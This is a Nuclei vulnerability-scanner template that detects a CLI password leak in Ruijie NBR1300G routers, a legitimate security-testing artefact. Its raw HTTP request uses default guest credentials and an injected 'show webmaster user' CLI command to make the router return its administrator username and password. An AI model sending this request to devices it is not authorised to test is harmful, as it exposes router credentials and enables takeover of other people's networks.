nuclei-templates/exposures/configs/ruijie-nbr1300g-exposure.yaml

38 lines
1.1 KiB
YAML

id: ruijie-nbr1300g-exposure
info:
name: Ruijie NBR1300G Cli Password Leak - Detect
author: pikpikcu
severity: medium
description: Ruijie NBR1300G CLI password leak vulnerability was detected.
reference:
- http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7NBR%201300G%E8%B7%AF%E7%94%B1%E5%99%A8%20%E8%B6%8A%E6%9D%83CLI%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
- https://www.ruijienetworks.com
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-200
tags: ruijie,exposure
requests:
- raw:
- |
POST /WEB_VMS/LEVEL15/ HTTP/1.1
Host: {{Hostname}}
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
matchers-condition: and
matchers:
- type: word
words:
- "webmaster level 2 username guest password guest"
part: body
- type: status
status:
- 200
# Enhanced by md on 2023/02/23